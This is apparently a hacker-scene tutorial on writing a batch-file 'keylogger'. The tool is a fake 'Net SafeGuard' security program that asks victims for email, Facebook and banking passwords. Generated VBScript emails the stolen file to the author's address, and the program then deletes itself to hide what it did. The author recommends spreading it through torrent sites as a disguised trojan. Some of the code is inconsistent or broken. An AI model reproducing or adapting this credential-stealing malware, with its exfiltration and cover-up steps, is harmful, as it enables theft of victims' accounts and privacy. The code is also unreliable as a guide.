MEANDERINGS: Theory On batch Keylogging By cOrRuPt G3n3t!x First off i'd like readers to know, im not big on theories, but this however might catch the eye of a more experienced batch coder and be made into something really incredible! Well i hope... Today i would like to talk about keylogging in batch, I know many people will look at me as if im crazy but hey this is just my theory and with a little bit of passion and dedication anything is possible! Now when i talk about batch keylogging, i mean a application coded in batch that will record everything typed into it, however, There are some problems that become evident: a) Is it even possible to make a keylogger using batch? The answer is yes. Here is the code i have came up with and will explain each line as we go along: -------------------------------[Cut Here]-------------------------------------- @echo off ::First Batch Keylogger By cOrRuPt G3n3t!x :: BAT/KeyLogger.1,7KB.CG :getkeys echo Type your keys and press ENTER set /p keys= echo.%keys%>>C:\Windows\System\keysLogged.txt goto getkeys -------------------------------[Cut Here]-------------------------------------- @echo off - Makes sure the user cant see the lines of code in the keylogger (basically just neatens things up) ::First Batch Keylogger By cOrRuPt G3n3t!x :: BAT/KeyLogger.1,7KB.CG - just what i named the program and does nothing else :getkeys - Is a simple label for the specific routine of the code echo Type your keys and press ENTER - Writes text on screen to prompt user input set /p keys= - sets the word keys to be what ever the user has typed echo.%keys%>>C:\Windows\System\keysLogged.txt - sends the typed keys to a txt file in C:\Windows\System directory goto getkeys - loops the application to keep prompting for keys until exited Now we have a working keylogger which will type all keys that the user pressed to a .txt document. However it is by no means stealth or anything of the sort!! Which brings us to the next dilema: b) How will we get the user to type his e-mail, computer password etc into our fony application? This delves deep into the human sycosis! haha, meaning our only option is to work on the average dumb computer users phsycology and exploit it. So we ask ourselves 'What do they fear most?' The answer.. Hackers, Virii etc. So we could pose our application as a safe way to connect to e-mail, facebook, internet banking etc and then post it on a site such as bittorrent or piratebay.org What our application shall do is ask for the passwords, websites and e-mails in advance, and then once they are finished the keys shall be stored in a 'safe' place on their computer ready for you to exploit 'em. So now we have the user willingly typing private data into our apllication... Here is my code for my fony Net SafeGuard: -------------------------------[Cut Here]-------------------------------------- @echo off ::First Batch Keylogger By cOrRuPt G3n3t!x :: BAT/KeyLogger.1,7KB.CG color f3 echo Net SafeGuard [Version 8.91a] echo Helps protect your data against malicious tools and hackers. echo. echo. echo. echo. :getkeys echo Please type in your e-mail adress followed by a space your password echo and then the site from which you access your e-mails. This will then echo be stored and next time you use Net SafeGuard you will not have to retype echo everything. Press ENTER once finished typing or to skip! echo. echo. (www.NetSafeGuard.com) set /p keys= echo.%keys%>>C:\Windows\System\keysLogged.txt exit -------------------------------[Cut Here]-------------------------------------- The above was a short example of what can be done if enough thought is put into it. but we however still have another problem... How do we send this information to oursleves? We could use any generic VBS script but we would have to then be in their contact list, so i have now come up with another way to do this. The keys will then be sent to you via e-mail all you need to do is fill in your e-mail adress in line 10 and the e-mail subject will be "keyslogged" from 'Exploited User' See below to see how my mail script will work: -------------------------------[Cut Here]-------------------------------------- echo.Set Logger = CreateObject("CDO.Message")>>C:\Windows\System\keys.vbs echo.Logger.Subject = "Keys Logged">>C:\Windows\System\keys.vbs echo.Logger.From = "Exploited User">>C:\Windows\System\keys.vbs echo.Logger.To = "someone@something.com">>C:\Windows\System\keys.vbs echo.Logger.TextBody = "Here are keys from the users computer!">>C:\Windows\System\keys.vbs echo.Logger.AddAttachment "c:\KeysLogged.txt">>C:\Windows\System\keys.vbs echo.Logger.Send>>C:\Windows\System\keys.vbs echo.end if>>C:\Windows\System\keys.vbs call "C:\Windows\System\Keys.dll.vbs" del "C:\Windows\System\Keys.dll.vbs" del "C:\Windows\System\KeysLogged.txt" del %0 exit -------------------------------[Cut Here]-------------------------------------- Now that we have gone over the simplest form of the keylogger, you could make it ask them for other password such as facebook, bank accoutnts, p2p sharesites, chatrooms and other data etc because it will log all their passwords in then send itself to you and delete itself of of the users system leaving no trace behind and the passwords safely in your grasp! This is illustrated below: -------------------------------[Cut Here]-------------------------------------- @echo off ::First Batch Keylogger By cOrRuPt G3n3t!x :: BAT/KeyLogger.1,7KB.CG color f3 echo Net SafeGuard [Version 8.91a] echo Helps protect your data against malicious tools and hackers. echo. echo. echo. echo. :getkeys echo Please type in your e-mail adress followed by a space your password echo and then the site from which you access your e-mails. This will then echo be stored and next time you use Net SafeGuard you will not have to retype echo everything. Press ENTER once finished typing or to skip! echo. echo. (www.NetSafeGuard.com) echo. set /p keys= echo.%keys%>>C:\Windows\System\keysLogged.txt cls echo Net SafeGuard [Version 8.91a] echo Helps protect your data against malicious tools and hackers. echo. echo. echo. echo. echo Now Please Enter Your Facebook profile password and e-mail adress echo. echo. (www.NetSafeGuard.com) echo. set /p keys= echo.%keys%>>C:\Windows\System\keysLogged.txt echo.Set Logger = CreateObject("CDO.Message")>>C:\Windows\System\keys.dll.vbs echo.Logger.Subject = "Keys Logged">>C:\Windows\System\keys.dll.vbs echo.Logger.From = "Exploited User">>C:\Windows\System\keys.dll.vbs echo.Logger.To = "someone@something.com">>C:\Windows\System\keys.dll.vbs echo.Logger.TextBody = "Here are keys from the users computer!">>C:\Windows\System\keys.dll.vbs echo.Logger.AddAttachment "c:\KeysLogged.txt">>C:\Windows\System\keys.dll.vbs echo.Logger.Send>>C:\Windows\System\keys.dll.vbs echo.end if>>C:\Windows\System\keys.dll.vbs call "C:\Windows\System\Keys.dll.vbs" del "C:\Windows\System\Keys.dll.vbs" del "C:\Windows\System\KeysLogged.txt" del %0 exit -------------------------------[Cut Here]-------------------------------------- And whoah, its size is only 1,7KB. Amazing what batch can do huh? And in such a small space too :)!!! Thats it for now, please send all queries or comments. I hope you are able to gain something out of this tutorial please dont be a lamer and remember... THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY. You should not exploit others data and privacy for no reason, i am merely showing all those batch critics that the language is by no means dead!!! And it was all tested on Windows Vista. And obviously no AV detected it as its a first of its kind ;). Look out for my next tutorial until then.... ViVa La ReVolUtCiOun MoThErFucKeR!!! [?]Contact Me: ----------- [@]immortalassassin@rocketmail.com